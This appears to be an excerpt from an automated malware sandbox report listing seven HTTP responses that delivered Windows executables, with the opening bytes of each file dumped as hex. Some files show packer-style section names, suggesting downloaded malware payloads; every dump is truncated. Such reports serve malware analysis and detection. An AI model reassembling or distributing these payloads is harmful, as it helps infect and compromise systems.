Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:29 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Sun, 22 Sep 2024 20:59:29 GMTConnection: keep-aliveETag: "66f08531-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 80 b6 e6 ea 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 d6 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 68 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:32 GMTContent-Type: application/octet-streamContent-Length: 986112Last-Modified: Tue, 24 Sep 2024 18:05:31 GMTConnection: keep-aliveETag: "66f2ff6b-f0c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 27 31 f2 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 02 0f 00 00 08 00 00 00 00 00 00 82 21 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 21 0f 00 57 00 00 00 00 40 0f 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 01 0f 00 00 20 00 00 00 02 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 60 05 00 00 00 40 0f 00 00 06 00 00 00 04 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0f 00 00 02 00 00 00 0a 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 21 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 50 d9 0e 00 d8 47 00 00 03 00 00 00 e7 00 00 06 94 55 00 00 bc 83 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 02 03 28 d4 00 00 06 2a 00 00 00 3e 03 02 28 18 00 00 0a 04 6f 56 00 00 06 26 2a 2e 73 0c 00 00 06 80 01 00 00 04 2a 1b 30 04 00 88 01 00 00 01 00 00 11 28 19 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 33 07 28 07 00 00 06 2d 03 16 6a 2a 7e 01 00 00 04 25 13 0b 28 1c 00 00 0a 7e 01 00 00 04 6f 0d 00 00 06 0c 08 16 6a 40 38 01 00 00 28 1d 00 00 0a 13 08 73 1e 00 00 0a 0b 11 08 6f 1f 00 00 0a 13 07 de 11 26 11 08 6f 20 00 00 0a 73 21 00 00 0a 13 07 de 00 11 07 6f 22 00 00 0a 0d 09 2c 07 09 8e 69 2d 02 14 0d 09 2c 07 07 09 6f 23 00 00 0a 07 28 24 00 00 0a 11 07 6f 25 00 00 0a 6f 26 00 00 0a 6f 23 00 00 0a d0 05 00 00 02 28 1a 00 00 0a 28 09 00 00 06 13 05 28 19 00 00 06 13 06 07 11 05 1e 63 d2 6f 27 00 00 0a 07 11 06 d2 6f 27 00 00 0a 07 11 05 1f 18 63 d2 6f 27 00 00 0a 07 11 06 1e 63 d2 6f 27 00 00 0a 07 11 05 d2 6f 27 00 00 0a 07 11 06 1f 18 63 d2 6f 27 00 00 0a 07 11 05 1f 10 63 d2 6f 27 00 00 0a 07 11 06 1f 10 63 d2 6f 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:34 GMTContent-Type: application/octet-streamContent-Length: 367616Last-Modified: Wed, 25 Sep 2024 17:02:23 GMTConnection: keep-aliveETag: "66f4421f-59c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b1 ea f3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 92 05 00 00 08 00 00 00 00 00 00 3e b1 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 b0 05 00 53 00 00 00 00 c0 05 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 b0 af 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 91 05 00 00 20 00 00 00 92 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 05 00 00 06 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b1 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c8 9e 05 00 e8 10 00 00 03 00 02 00 10 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 84 c5 64 0e 83 9a 4b be 0c f9 53 6b 0c ce 2b 47 ae 7f bf ee 51 8c ae fa 11 9d 1d 88 f7 af 95 1b ca 86 4a 19 6e 6a a4 49 d5 6b ad cb 29 f0 cd 45 26 45 89 38 5f de 62 b0 a3 de 24 10 17 b4 8c ff 09 ec d9 ee df 28 23 3f 6f 38 d0 0a c1 b5 0f 62 9d 39 b0 01 06 e9 7e 56 b5 34 83 99 76 31 d7 75 54 e1 30 da 86 1c 16 1d 5e 2e a0 d3 4c 62 81 a6 cb 0c 87 a8 c0 f8 3b d5 83 8f 0e 35 05 48 19 02 5e 84 31 8f 7c 3c c5 96 a5 60 79 35 34 a7 12 f2 66 e5 7e 0e ef 59 2c cc 53 2c 11 d1 57 70 f2 53 5b 36 83 86 dd 9c 9b 4e 6b fc 45 1e 08 5e d9 12 10 69 26 f8 a3 a4 bf fe 8d f7 10 3f 6f 6e 04 0a 8a 9f 7e 21 10 36 41 bb 01 d2 41 0e c5 96 ef 1d 4a 94 e4 8e 6e db d0 b3 78 0e 54 12 48 ea 61 92 d0 f0 9e b1 c9 ea d2 7a cc 17 08 63 d3 57 d3 85 1b 90 6e a2 67 23 75 a1 3e a3 41 91 da e7 84 36 4b 99 71 63 52 df 39 84 4c 89 da 3b 11 7a d2 73 3c eb ba df a1 92 6a f4 7c 1d 0e 9a 8c 92 0a bd 49 3a b2 77 e0 17 48 24 ed cc f3 90 7a 0f 5d 4d 48 8d 03 43 68 44 8f 79 d2 99 3e e
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:37 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 01:43:45 GMTETag: "1be200-6230ffc554407"Accept-Ranges: bytesContent-Length: 1827328Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2f ba f1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 60 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 76 d4 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 69 69 6b 62 78 7a 67 00 80 19 00 00 d0 4f 00 00 7e 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 6e 79 6e 68 6d 68 6b 00 10 00 00 00 50 69 00 00 06 00 00 00 ba 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 69 00 00 22 00 00 00 c0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:42 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 02:17:24 GMTETag: "1d7200-6231074af51cc"Accept-Ranges: bytesContent-Length: 1929728Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 a0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4c 00 00 04 00 00 1c 60 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 85 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 85 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 77 7a 6f 75 6b 7a 68 00 60 1a 00 00 30 32 00 00 58 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 61 68 7a 73 67 75 64 00 10 00 00 00 90 4c 00 00 04 00 00 00 4c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4c 00 00 22 00 00 00 50 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 02:21:45 GMTContent-Type: application/octet-streamContent-Length: 3643904Last-Modified: Thu, 26 Sep 2024 19:28:15 GMTConnection: keep-aliveETag: "66f5b5cf-379a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 80 02 85 16 00 00 00 00 00 00 00 00 f0 00 02 01 0b 02 08 00 00 5c 23 00 00 3c 14 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 23 00 ac 3a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 5b 23 00 00 20 00 00 00 5c 23 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 3a 14 00 00 80 23 00 00 3c 14 00 00 5e 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 58 e5 22 00 54 96 00 00 00 00 02 00 4e 00 00 06 a4 b7 00 00 b2 2d 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c7 7e 19 bc 80 fc 50 74 80 66 ad 9d 4c 5e 5b 31 e4 77 a8 75 91 fd a0 ce d2 95 17 42 5a c5 46 14 82 e4 aa 21 9b ea df fa 2d 0e 28 9b 04 83 45 11 e2 21 6c 04 7c c1 49 c9 dd 49 e8 ea e5 0d 19 b9 1f 98 1b 66 b2 39 94 f9 96 ac 48 83 d4 04 ca 4f 4f 05 5f 39 58 42 96 c0 9b e0 43 52 01 f4 15 1f f3 6e 7c 6b 68 de 5e a9 8b 72 6c cf 79 c5 f3 d8 7e 99 9a df ad df 60 db 02 5a ca d0 f4 42 f8 a0 97 28 8e 65 87 5f e6 70 a6 b4 ac e5 d4 c6 46 d5 eb 6a d3 67 5a 34 70 13 0e 9f 68 0d 14 8c b3 48 79 ca 37 50 36 8d 51 1e b1 29 39 f7 32 79 07 3a 13 f3 e4 8a 6e 90 46 62 b7 7a 57 e6 f5 d8 5c 19 01 63 6c 09 8e f5 9e 5d 18 b4 b4 31 f9 77 e0 93 98 2d f9 1f a7 28 d9 e7 84 d4 97 ba 36 69 28 d7 cb 20 f6 ce 0d fc ab 1d 55 86 72 b9 db 14 67 40 99 c2 4e c7 de 3d 71 d8 89 83 83 b8 5d e2 27 ad 8b db 64 d9 80 12 86 9a 81 db c8 20 b5 1f 0b 70 6c 57 21 72 1b 5f f8 8e ad 1d 44 88 78 f1 be 71 5f c3 2d fe af 8d bf 87 3c b2 46 03 73 51 23 69 78 13 4c 06 c1 b3 92 2b e2 d5 2c 62 cc fd 22 8e 1c 57 c0 f1
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Sep 2024 02:21:57 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 27 Sep 2024 02:16:55 GMTETag: "11d000-6231072fb785a"Accept-Ranges: bytesContent-Length: 1167360Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8f 15 f6 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 46 a2 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 f0 65 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 65 04 00 00 40 0d 00 00 66 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
